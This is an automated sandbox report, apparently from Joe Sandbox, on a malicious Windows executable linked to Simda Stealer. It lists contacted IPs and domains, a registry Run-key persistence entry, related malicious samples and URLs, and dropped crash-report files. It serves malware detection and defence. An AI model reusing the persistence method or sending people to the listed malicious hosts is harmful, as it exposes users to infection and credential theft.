106.15.137.66	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
103.224.212.210	lyxynyx.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
18.208.156.248	pupycag.com	United States	14618	AMAZON-AESUS	true
208.100.26.245	lyvyxor.com	United States	32748	STEADFASTUS	true
103.224.182.252	vofycot.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
199.59.243.226	77026.bodis.com	United States	395082	BODIS-NJUS	true
103.150.11.230	gtm-sg-6l13ukk0m05.qu200.com	unknown	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
3.64.163.50	puzylyp.com	United States	16509	AMAZON-02US	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
162.255.119.102	gahyqah.com	United States	22612	NAMECHEAP-NETUS	true
188.114.97.3	lysyvan.com	European Union	13335	CLOUDFLARENETUS	true
44.221.84.105	gadyciz.com	United States	14618	AMAZON-AESUS	true
154.212.231.82	gadyniw.com	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
188.114.96.3	qegyhig.com	European Union	13335	CLOUDFLARENETUS	true
85.17.31.122	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
69.162.80.58	unknown	United States	46475	LIMESTONENETWORKSUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1498165
Start date and time:	2024-08-23 18:46:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	16
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Bonelessness.exe
Detection:	MAL
Classification:	mal100.bank.troj.spyw.expl.evad.winEXE@117/43@2385/28
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 71 Number of non-executed functions: 262
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.23.209.150, 2.23.209.140, 2.23.209.135, 2.23.209.149, 2.23.209.141, 2.23.209.130, 2.23.209.143, 2.23.209.144, 2.23.209.189, 2.23.209.142, 2.23.209.185, 2.23.209.132, 2.23.209.133, 2.23.209.186, 2.23.209.179, 2.23.209.177, 2.23.209.183, 2.23.209.181, 2.23.209.187, 2.23.209.182, 2.23.209.131, 2.23.209.148, 20.189.173.20
Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Bonelessness.exe

Simulations

Behavior and APIs

Time	Type	Description
12:47:45	API Interceptor	24898x Sleep call for process: svchost.exe modified
12:47:52	API Interceptor	4x Sleep call for process: WerFault.exe modified
17:47:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run userinit C:\Windows\apppatch\svchost.exe
17:47:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run userinit C:\Windows\apppatch\svchost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.94.10.34	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
64.190.63.136	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
	http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0	Get hash	malicious	Unknown	Browse	sedoparking.com/frmpark/efense.com/Skenzor1/park.js
	http://leostop.com	Get hash	malicious	Unknown	Browse	ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1
	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	ww1.icodeps.com/?usid=27&utid=6773648594
	http://datingsitefree.pages.dev/link-2	Get hash	malicious	Unknown	Browse	ww1.ngelits.com/search/tsc.php?200=NTY0Nzc0OTIz&21=OC40Ni4xMjMuMzM=&681=MTcyMTc3NTA4OTJjZTdkMmM1NjEwYTgyMzJjZDQwY2EzZjJmNzA0YTEy&crc=5d6b65933af518cdf4d15c16efb5151a23c299ab&cv=1
	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	ww1.flu.cc/?usid=17&utid=
	Reporte Comercial.pdf	Get hash	malicious	Unknown	Browse	ww1.pinochoconciertos.co/search/tsc.php?200=NTcxMTM0OTU2&21=OC40Ni4xMjMuMzM=&681=MTcxOTU5ODQ3MjU1NDYzYjVjOGQ4NGY5ZTRmYjFjZTRiNzhkZjBlODAy&crc=4cd4c0d65f78dddfc0f42871994ccdfc14d83923&cv=1
	pk3hXijbfHZz69Q.exe	Get hash	malicious	FormBook	Browse	www.fullpaw.com/cr12/?jBZHx=KneTJ&t8o4ntI=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf
	FX6nkep9GCEHbmb.exe	Get hash	malicious	FormBook	Browse	www.fullpaw.com/cr12/?8pY=c2MXfj9hZ4EphnoP&ZPx4zB2H=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf
	file.exe	Get hash	malicious	CMSBrute	Browse	ww1.runfoxyrun.com/administrator/?usid=18&utid=25958169812
15.197.240.20	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	qexyhuv.com/login.php
	rPHOTO09AUG2024.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	LF2024022.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
	UAyH98ukuA.exe	Get hash	malicious	FormBook	Browse	www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
	240330_unpacked	Get hash	malicious	Unknown	Browse	pimphattana.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lysyvan.com	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	188.114.97.3
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	172.67.136.136
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
77026.bodis.com	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	199.59.243.226
	AxgZVzUv8m.exe	Get hash	malicious	Pony	Browse	199.59.243.226
	https://www.regionvictoriaville.com/page/?ContentID=1257	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://emv1.jo333.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://www.jo333.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://emv1.lqhyhy.cn/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://www.pnxubwf.cn/	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://costpointfoundations.co	Get hash	malicious	Unknown	Browse	199.59.243.226
	LisectAVT_2403002A_327.dll	Get hash	malicious	Wannacry	Browse	199.59.243.226
	Ia93PTYivQ.exe	Get hash	malicious	BlackMoon, Neshta	Browse	199.59.243.226
pupycag.com	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	18.208.156.248
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	34.174.78.212
	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	199.21.76.77
pupydeq.com	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	iN9u7DdJv4.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
lyvyxor.com	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	kz2xIsjyEH.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	iN9u7DdJv4.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	b1a72.exe	Get hash	malicious	Unknown	Browse	208.100.26.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NBS11696US	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	64.190.63.136
	KKveTTgaAAsecNNaaaa.ppc.elf	Get hash	malicious	Unknown	Browse	64.33.213.169
	http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0	Get hash	malicious	Unknown	Browse	64.190.63.136
	z55FACTURADEPROFORMApdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	64.190.62.22
	Transferencia bancaria.scr.exe	Get hash	malicious	FormBook	Browse	64.190.62.22
	Udspecialiser45.exe	Get hash	malicious	FormBook, GuLoader	Browse	64.190.62.22
	DHL SHIPPING DOCUMENT.exe	Get hash	malicious	FormBook	Browse	64.190.62.22
	7qBBKk0P4l.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
	mtuXDnH1Di.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
	7qBBKk0P4l.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
TANDEMUS	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	15.197.240.20
	http://solarrebater.org/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://ipfs.io/ipfs/Qmctx3fdVsajRA8gHw2wP5UHNMxaJ7D37h2UWxpgk6T6iK	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	http://att-108024.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	http://airdrop-manta-pacific-99s.pages.dev/	Get hash	malicious	Unknown	Browse	15.197.222.64
	https://www.iheartjane.com/embed/stores/3953/menu	Get hash	malicious	Unknown	Browse	15.197.213.252
	ptsss.exe	Get hash	malicious	FormBook	Browse	15.197.204.56
	QSFD.exe	Get hash	malicious	FormBook	Browse	15.197.192.55
	http://mantraonlittlebourke.guestreservations.com/35061/booking?gad_source=1&gclid=EAIaIQobChMIl-2ym7yFiAMV19QWBR2tTADfEAAYAiAFEgIBzPD_BwE	Get hash	malicious	Unknown	Browse	15.197.193.217
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	15.197.148.33
AKAMAI-ASN1EU	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	172.234.222.143
	file.exe	Get hash	malicious	Unknown	Browse	23.59.250.80
	file.exe	Get hash	malicious	Unknown	Browse	23.219.82.57
	file.exe	Get hash	malicious	Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	Unknown	Browse	104.70.121.216
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.9
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.42
	file.exe	Get hash	malicious	Unknown	Browse	23.200.0.42
	file.exe	Get hash	malicious	Unknown	Browse	23.219.161.132
	Review_Aonoro.pdf	Get hash	malicious	Unknown	Browse	88.221.110.136
AMAZON-AESUS	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	44.221.84.105
	Adobe Download Manager.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	44.221.84.105
	http://ikenn99.store/	Get hash	malicious	Unknown	Browse	18.211.221.153
	http://solarrebater.org/	Get hash	malicious	Unknown	Browse	34.227.216.239
	https://www.evernote.com/shard/s561/sh/11f2002c-b1a0-eb62-6088-816b3f90b1bb/Fg7pFg2UgsqSSiKlZa-LSaNHwI-aq133o_EjOkBitzRaEPMq5fq9Vaoh8A	Get hash	malicious	HTMLPhisher	Browse	34.235.253.128
	FW_ SLS properties Credit application.msg	Get hash	malicious	Unknown	Browse	52.71.28.102
	https://embeds.beehiiv.com/6ccbaa66-d598-45d6-bc9c-c0957ce3574c	Get hash	malicious	HTMLPhisher	Browse	3.89.65.79
	https://bstouten.sazular.com/?preview=1&v=99098329	Get hash	malicious	HTMLPhisher	Browse	34.202.63.170
	https://l4vm89ff.r.us-west-2.awstrack.me/L0/https:%2F%2Fsnip.ly%2FFedExx/1/010101917bbe6db8-0435991f-93dd-44cd-b7b8-51bfd5cf53c7-000000/HIvKUOwubES5gbenLtlgHO_SzP8=389	Get hash	malicious	Unknown	Browse	104.192.142.23
	Review_Aonoro.pdf	Get hash	malicious	Unknown	Browse	54.167.154.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	188.114.97.3 188.114.96.3
	x64_x32_installer__v4.2.2.msi	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	tKr6T60C1r.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	Vidar	Browse	188.114.97.3 188.114.96.3
	SUBOLETO202408-6861385.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	SUBOLETO202408-6861385.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_4a306575-26df-4041-8147-103cd9c1135b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9499942637973842
Encrypted:	false
SSDEEP:	96:C3FSBSeV+ts2hJoI7JfPQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9s:wOSektq0BU/gjR9SMzuiFnZ24IO8xW
MD5:	29A347ECC39F8DE4124DF7BC39D472F0
SHA1:	084098643659B7E4311218D19DFE519A3733C28C
SHA-256:	AF94BF8AF039658191FC1F3B334A173CB1558A0F7F36D456A1637FA0B3A77DA3
SHA-512:	6E9FF0938AB117D1E8E7EEA626948E6B1C46061A68E758EB0FD18DE11705B1DC3095809F9E819BA5E31AA3F925CBAC32D1096978C434286A6141B89C81CB5984
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.4.1.1.7.5.8.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.3.5.1.9.7.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.3.0.6.5.7.5.-.2.6.d.f.-.4.0.4.1.-.8.1.4.7.-.1.0.3.c.d.9.c.1.1.3.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.0.6.f.5.1.f.-.0.b.b.2.-.4.4.2.7.-.a.6.1.2.-.f.f.0.c.6.d.4.2.1.8.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.4.8.-.0.0.0.1.-.0.0.1.4.-.7.2.2.1.-.7.4.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_8c47cea0-cae9-42a8-9da3-79baa364af96\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.950022703678122
Encrypted:	false
SSDEEP:	192:SCO0ekmq0BU/gjR9SMzuiFnZ24IO8xWP:w0zmxBU/gjbnzuiFnY4IO8xW
MD5:	82DD2303C54AFF86B6E4FD8218267603
SHA1:	06D235DD6A0F1E16F9657AD789D6D9F7640FB775
SHA-256:	AB33407348BB02DB15399AF9DFBF2E388195D32C9E468DAB87EE6B4082B45D14
SHA-512:	584F55F8D06D77AB81501FC89EC40C238244309A031C1E4DCFCE3AB5E6E4493268FE9143B5EF1D82566EE4230D45DA3303D2CC35425EFE3C4CBD2A2EA02C906A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.4.8.0.5.3.9.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.6.0.2.2.8.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.4.7.c.e.a.0.-.c.a.e.9.-.4.2.a.8.-.9.d.a.3.-.7.9.b.a.a.3.6.4.a.f.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.0.2.1.b.0.3.-.b.8.e.3.-.4.f.8.d.-.8.b.8.c.-.2.c.0.e.3.9.3.a.b.7.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.d.9.2.0.-.7.1.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_902f3c5c-0108-482f-8f20-71da3efea5a6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9500041397510155
Encrypted:	false
SSDEEP:	96:D4AFjBeV+zs2hJoI7JfPQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN9s:D1fekzq0BU/gjR9SMzuiFnZ24IO8xW
MD5:	501F5F14296B9277C2D5106DCC79EBD7
SHA1:	DE29D5A97D23F56A5470EA15D23F35EEB84A41F6
SHA-256:	E424F2AEBC56BF9F02C5564F8012FB6E9BB91E3F131D7B9CAB24E15EF5A291AA
SHA-512:	0FB962703819A7E286BCC4581CB5488C5CEAE6FCFE23A53E33F098E5F2F3A3EB2D12A1961CD5E2D17BF6B84F0E0194F966F44DB26226F7DCCA7A695337C70201
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.7.1.8.2.9.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.6.9.9.9.5.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.2.f.3.c.5.c.-.0.1.0.8.-.4.8.2.f.-.8.f.2.0.-.7.1.d.a.3.e.f.e.a.5.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.8.5.5.2.d.e.-.0.6.4.4.-.4.e.5.d.-.a.0.e.d.-.a.f.6.1.d.9.c.4.f.b.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.4.-.3.5.0.1.-.6.f.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JbrLYfXaOpqnSngA_13dca41ce65a82e21f128bc7bc6bedcf7faa20f2_548695df_9f1990f4-dd50-44aa-a7dc-af5c27e850f2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9502251030455972
Encrypted:	false
SSDEEP:	96:QSF4ziBeV+7s2hJoI7JfPQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAENK:bZBek7q0BU/gjR9SMzuiFnZ24IO8xW
MD5:	7245BF2C922AF6282F4243BC5773DBC5
SHA1:	B984CFFF5B4A9009D938EF609FCFD0E2BAAB87B4
SHA-256:	51F3B17FF2BA8E04AB6C138BD0ED986A9B41019783515CB574008FEDDCC94EAF
SHA-512:	48ACA7BA25ED33F3A8734352B6C3E573D3FD3FC6B02F8399A5FA079F2483CA0FB7A8E894D5A4CD8733A094D06B4A37BA3B5E5D81A92209E5CF4FED56F1E6844C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.4.1.3.4.4.2.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.9.0.5.2.5.5.2.1.2.5.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.1.9.9.0.f.4.-.d.d.5.0.-.4.4.a.a.-.a.7.d.c.-.a.f.5.c.2.7.e.8.5.0.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.0.8.1.3.3.2.-.9.9.4.5.-.4.4.8.3.-.9.6.e.8.-.4.f.1.e.3.1.8.7.5.c.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.4.-.0.0.0.1.-.0.0.1.4.-.3.b.4.b.-.7.6.0.f.7.c.f.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.3.1.e.4.e.3.9.8.a.2.1.9.c.a.3.0.d.f.b.9.1.4.4.3.b.f.f.e.d.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.J.b.r.L.Y.f.X.a.O.p.q.n.S.n.g.A...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC84.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:34 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	101586
Entropy (8bit):	1.8119397781139144
Encrypted:	false
SSDEEP:	384:8zNAXQPz4cHsg2JdWVByeBzqAPSw6+8Na0vS/Wzg/Y:8Jf7HHsg2OCeUsSp+pQw
MD5:	ED65E85033DDCB6980E591477E2BFEF1
SHA1:	2D05D7004A2097227F0032039CC9B6E876BC05D2
SHA-256:	9CD5B5020D73079FE46FD65D28ABD6EB353754DB8CF2D458AC10341A74EE9546
SHA-512:	91536C10E495AD0A83DA07CB00464839A500669456596249FCFC4653C1218868794BD3188B9E962E0BDE39023C7A5E260DF57C776D2F65AB7D74B3BCFBC6DD6B
Malicious:	false
